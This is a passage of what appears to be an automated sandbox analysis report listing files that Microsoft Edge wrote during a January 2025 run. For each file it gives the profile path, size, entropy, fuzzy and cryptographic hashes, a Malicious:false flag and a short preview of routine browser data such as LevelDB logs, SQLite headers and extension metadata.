                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):285
                                                                                                                                                                  Entropy (8bit):5.167443231186632
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/IXRRq1wkn23oH+Tcwt86FB2KLl9H4HN+q2Pwkn23oH+Tcwt865IFUv:7/afYeb/FFLzwIvYfYeb/WFUv
                                                                                                                                                                  MD5:AA934DE9028324928E1D4709BE60B2B4
                                                                                                                                                                  SHA1:6E0EB682E624A8555577168396B341CCFEEB8522
                                                                                                                                                                  SHA-256:D7E74C4B56C7404B902C373722FADC3BB9DB6F9EE03EFC0F4A6F7E0204A83080
                                                                                                                                                                  SHA-512:70329DCC08C0EDA66D2056DAED466206E024DEBB12981862597B8B9FF8D12DEA240868E720590CB26ABF86AE0C61884452D8585C912C76AD92AA7F6547EC5A07
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:54.302 1ec8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts since it was missing..2025/01/06-17:17:54.316 1ec8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\MANIFEST-000001

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1197
                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
                                                                                                                                                                  MD5:A2A3B1383E3AAC2430F44FC7BF3E447E
                                                                                                                                                                  SHA1:B807210A1205126A107A5FE25F070D2879407AA4
                                                                                                                                                                  SHA-256:90685D4E050DA5B6E6F7A42A1EE21264A68F1734FD3BD4A0E044BB53791020A2
                                                                                                                                                                  SHA-512:396FAB9625A2FF396222DBC86A0E2CDE724C83F3130EE099F2872AED2F2F2ECE13B0853D635F589B70BD1B5E586C05A3231D68CAF9E46B6E2DAC105A10D0A1C8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                  Entropy (8bit):5.198343435355949
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/MTUyq2Pwkn23oH+Tcwt8NIFUtNMcWz1ZmwzMVPgjRkwOwkn23oH+Tcwt8+eLJ:7/MTJvYfYebpFUtNMzz1/zMBgF5JfYey
                                                                                                                                                                  MD5:4D07A3CC297F31F5B98AB6CC1FA0796B
                                                                                                                                                                  SHA1:6B6066B5CF934CB5BFA3CB7564B78C88B2AFF375
                                                                                                                                                                  SHA-256:0BB4A935783699BC5E0278083005EEA04E391B3ECE5D9094A82615B2C852BC6D
                                                                                                                                                                  SHA-512:12A8CDC4DB161DBABB6C81DAA0FBECF64A882BA716F291E6F35BF2DC2B93B787DF67D84373679D1612F078EC99C7FBB6897817F905A25FCCC358DCF7E5BE847A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:55.293 1e94 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/06-17:17:55.294 1e94 Recovering log #3.2025/01/06-17:17:55.295 1e94 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                  Entropy (8bit):5.198343435355949
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/MTUyq2Pwkn23oH+Tcwt8NIFUtNMcWz1ZmwzMVPgjRkwOwkn23oH+Tcwt8+eLJ:7/MTJvYfYebpFUtNMzz1/zMBgF5JfYey
                                                                                                                                                                  MD5:4D07A3CC297F31F5B98AB6CC1FA0796B
                                                                                                                                                                  SHA1:6B6066B5CF934CB5BFA3CB7564B78C88B2AFF375
                                                                                                                                                                  SHA-256:0BB4A935783699BC5E0278083005EEA04E391B3ECE5D9094A82615B2C852BC6D
                                                                                                                                                                  SHA-512:12A8CDC4DB161DBABB6C81DAA0FBECF64A882BA716F291E6F35BF2DC2B93B787DF67D84373679D1612F078EC99C7FBB6897817F905A25FCCC358DCF7E5BE847A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:55.293 1e94 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/06-17:17:55.294 1e94 Recovering log #3.2025/01/06-17:17:55.295 1e94 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ExtensionActivityComp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 1, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4096
                                                                                                                                                                  Entropy (8bit):0.3169096321222068
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:lSWbNFl/sl+ltl4ltllOl83/XWEEabIDWzdWuAzTgdWj3FtFIU:l9bNFlEs1ok8fDEPDadUTgd81Z
                                                                                                                                                                  MD5:2554AD7847B0D04963FDAE908DB81074
                                                                                                                                                                  SHA1:F84ABD8D05D7B0DFB693485614ECF5204989B74A
                                                                                                                                                                  SHA-256:F6EF01E679B9096A7D8A0BD8151422543B51E65142119A9F3271F25F966E6C42
                                                                                                                                                                  SHA-512:13009172518387D77A67BBF86719527077BE9534D90CB06E7F34E1CCE7C40B49A185D892EE859A8BAFB69D5EBB6D667831A0FAFBA28AC1F44570C8B68F8C90A4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ExtensionActivityEdge

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 8, cookie 0x8, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                  Entropy (8bit):0.40981274649195937
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:TL1WK3iOvwxwwweePKmJIOAdQBVA/kjo/TJZwJ9OV3WOT/5eQQ:Tmm+/9ZW943WOT/
                                                                                                                                                                  MD5:1A7F642FD4F71A656BE75B26B2D9ED79
                                                                                                                                                                  SHA1:51BBF587FB0CCC2D726DDB95C96757CC2854CFAD
                                                                                                                                                                  SHA-256:B96B6DDC10C29496069E16089DB0AB6911D7C13B82791868D583897C6D317977
                                                                                                                                                                  SHA-512:FD14EADCF5F7AB271BE6D8EF682977D1A0B5199A142E4AB353614F2F96AE9B49A6F35A19CC237489F297141994A4A16B580F88FAC44486FCB22C05B2F1C3F7D1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j............M.....8...b..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):429
                                                                                                                                                                  Entropy (8bit):5.809210454117189
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                  MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                  SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                  SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                  SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 39, 1st free page 10, free pages 4, cookie 0x45, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.5241404324800358
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:56U+bGzPDLjGQLBE3up+U0jBo4tgi3JMe9xJDECVjN:5R+GPXBBE3upb0HtTTDxVj
                                                                                                                                                                  MD5:241322143A01979D346689D9448AC8C0
                                                                                                                                                                  SHA1:DD95F97EE1CCB8FD9026D2156DE9CB8137B816D1
                                                                                                                                                                  SHA-256:65EEBDEC4F48A111AC596212A1D71C3A5CFA996797500E5344EEABDFA02527C8
                                                                                                                                                                  SHA-512:9C7241462A9DADEF25D8EEB1C14BABFBA65C451EBAFBC068B9856E4EF0EB6F894A44686CBB0D1F46C7F546335D0C53A3E386E6C1A017082DE127F8F9C0A54BD2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'...........E......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8720
                                                                                                                                                                  Entropy (8bit):0.32780102044485143
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:nA/J3+t76Y4QZZofU99pO0BYxlkqR4EZY4QZvG2:AhHQws9LdQZBQZG2
                                                                                                                                                                  MD5:202DA313EBEB15BCFF0F90BD01B61FBE
                                                                                                                                                                  SHA1:F8DCF2C11443871EC1B007FD3C60DF519667FAC6
                                                                                                                                                                  SHA-256:94B77862A83F5F2D3E4ABD5D1130D7C2C9E5422092FCF9CFFC7F633FE7AC7FA2
                                                                                                                                                                  SHA-512:197E59E5CC2F4C8F8CCEDA9F87D5E4ADAD98793A13C4B9AC892452974144DAC10B7ECA6F54571B0E99F9B7C3108D9DA57ABE69AC58623554242960BC21FFD471
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...............g...'....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 11, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):45056
                                                                                                                                                                  Entropy (8bit):3.5489333276543484
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:zj9P0FFcSQkQerR773pLQP/Kbt6hkCgam6IWRKToaAu:zdiqSe2R7KP/F+FmRKcC
                                                                                                                                                                  MD5:EAAE616CDEE5421C39E54F7C586C75A2
                                                                                                                                                                  SHA1:67C4C181D938DA92B92F04653C695C17302A5DAE
                                                                                                                                                                  SHA-256:744A583C900F9ED94D08849D056C27B2E61EC6140CC58CAD3EA1445A15B65170
                                                                                                                                                                  SHA-512:ABD7572B3BC83E502038CA99571350915CD1A4712C0CC0696E936F8A3745723F9D5BDEA54A9B11FF344C4A887081F270266A16551B8F91CB08033F54F36A7056
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):406
                                                                                                                                                                  Entropy (8bit):5.288361055136092
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:7/ABOvYfYeb8rcHEZrELFUtNAi/zAO5JfYeb8rcHEZrEZSJ:7/pYfYeb8nZrExgNf7JfYeb8nZrEZe
                                                                                                                                                                  MD5:C77401B4DCE935AD5D67E2D0E812BA41
                                                                                                                                                                  SHA1:6CCADB59E7A86DFAECD9218345C9F021F104CCCF
                                                                                                                                                                  SHA-256:AD503A85E3637C8B6AD0301A27FFB64E99551DEE69F39D7419977E9813A04896
                                                                                                                                                                  SHA-512:95FC0D2BB5B73A7F293FD6B4F358D1C6CE73427A1834CE527DFB7B23EE9393D6C738071EFE49A9F677A420108A22228A1DF7260EC0BF9AF14E1280F8BB738949
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:59.372 1e04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/06-17:17:59.373 1e04 Recovering log #3.2025/01/06-17:17:59.373 1e04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):406
                                                                                                                                                                  Entropy (8bit):5.288361055136092
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:7/ABOvYfYeb8rcHEZrELFUtNAi/zAO5JfYeb8rcHEZrEZSJ:7/pYfYeb8nZrExgNf7JfYeb8nZrEZe
                                                                                                                                                                  MD5:C77401B4DCE935AD5D67E2D0E812BA41
                                                                                                                                                                  SHA1:6CCADB59E7A86DFAECD9218345C9F021F104CCCF
                                                                                                                                                                  SHA-256:AD503A85E3637C8B6AD0301A27FFB64E99551DEE69F39D7419977E9813A04896
                                                                                                                                                                  SHA-512:95FC0D2BB5B73A7F293FD6B4F358D1C6CE73427A1834CE527DFB7B23EE9393D6C738071EFE49A9F677A420108A22228A1DF7260EC0BF9AF14E1280F8BB738949
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:59.372 1e04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/06-17:17:59.373 1e04 Recovering log #3.2025/01/06-17:17:59.373 1e04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1660
                                                                                                                                                                  Entropy (8bit):5.644719215983779
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:mZ6hC3QXZXJV03Sx4/HyztQEWSJ7AHHk2GJ348ylsT:m2Cy5JvQdP8osT
                                                                                                                                                                  MD5:D08659729C4AB97F019315F93C0045EC
                                                                                                                                                                  SHA1:F980E663DE6FABAE5DEA5F15509983A0983884A4
                                                                                                                                                                  SHA-256:58E048278F957ECAFA238605A7B2C0A730E15C02411E89D9BA4BE413C338ECE5
                                                                                                                                                                  SHA-512:FAFEB63BD74DFF122D6A25EC6C7F3FD7D8E2C5444ED5FB3298B0E46A8EEAE94653FB95B9CF479119B7E2F51137286B67B383E4EC5AE75EE34F9FF92B54CCD867
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..-b.................VERSION.1..META:https://ntp.msn.com..............!_https://ntp.msn.com..LastKnownPV..1736201884966.-_https://ntp.msn.com..LastVisuallyReadyMarker..1736201886144.._https://ntp.msn.com..MUID!.1B715D3435BD60832FC8485834156189.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1736201885071,"schedule":[-1,-1,-1,-1,24,26,25],"scheduleFixed":[-1,-1,-1,-1,24,26,25],"simpleSchedule":[9,52,12,49,13,27,26]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1736201884936.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20250106.365"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Mon Jan 06 2025 17:18:04 GMT-0500 (Eastern Standar

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):334
                                                                                                                                                                  Entropy (8bit):5.169342023753412
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/2Vq2Pwkn23oH+Tcwt8a2jMGIFUtNUgZmwzaOIkwOwkn23oH+Tcwt8a2jMmLJ:7/ivYfYeb8EFUtNd/za55JfYeb8bJ
                                                                                                                                                                  MD5:D0463577A9F9A58BD32F1558B8896385
                                                                                                                                                                  SHA1:57FDF088C6B49AE0B244F44D17634832118076B4
                                                                                                                                                                  SHA-256:73E2BD4969704040AAF79E0F3E6C34CB4797798909FE671E93F85F9C461C11F4
                                                                                                                                                                  SHA-512:036C25B3B08302BF24238D768CC9292FACD82457EF2108A13C2A49084C740CAD6678EE989A3A8FD5223BBBD9613E3B0BC0983B8A6D0F177162B182780DBF6AAF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:54.710 1870 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/06-17:17:54.712 1870 Recovering log #3.2025/01/06-17:17:54.715 1870 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):334
                                                                                                                                                                  Entropy (8bit):5.169342023753412
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/2Vq2Pwkn23oH+Tcwt8a2jMGIFUtNUgZmwzaOIkwOwkn23oH+Tcwt8a2jMmLJ:7/ivYfYeb8EFUtNd/za55JfYeb8bJ
                                                                                                                                                                  MD5:D0463577A9F9A58BD32F1558B8896385
                                                                                                                                                                  SHA1:57FDF088C6B49AE0B244F44D17634832118076B4
                                                                                                                                                                  SHA-256:73E2BD4969704040AAF79E0F3E6C34CB4797798909FE671E93F85F9C461C11F4
                                                                                                                                                                  SHA-512:036C25B3B08302BF24238D768CC9292FACD82457EF2108A13C2A49084C740CAD6678EE989A3A8FD5223BBBD9613E3B0BC0983B8A6D0F177162B182780DBF6AAF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:54.710 1870 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/06-17:17:54.712 1870 Recovering log #3.2025/01/06-17:17:54.715 1870 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 28, cookie 0x1d, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):57344
                                                                                                                                                                  Entropy (8bit):0.863060653641558
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:u7/KLPeymOT7ynlm+yKwt7izhGnvgbn8MouB6wznP:u74CnlmVizhGE7IwD
                                                                                                                                                                  MD5:C681C90B3AAD7F7E4AF8664DE16971DF
                                                                                                                                                                  SHA1:9F72588CEA6569261291B19E06043A1EFC3653BC
                                                                                                                                                                  SHA-256:ADB987BF641B2531991B8DE5B10244C3FE1ACFA7AD7A61A65D2E2D8E7AB34C1D
                                                                                                                                                                  SHA-512:4696BF334961E4C9757BAC40C41B4FBE3E0B9F821BD242CE6967B347053787BE54D1270D7166745126AFA42E8193AC2E695B0D8F11DE8F0B2876628B7C128942
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network Action Predictor

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):45056
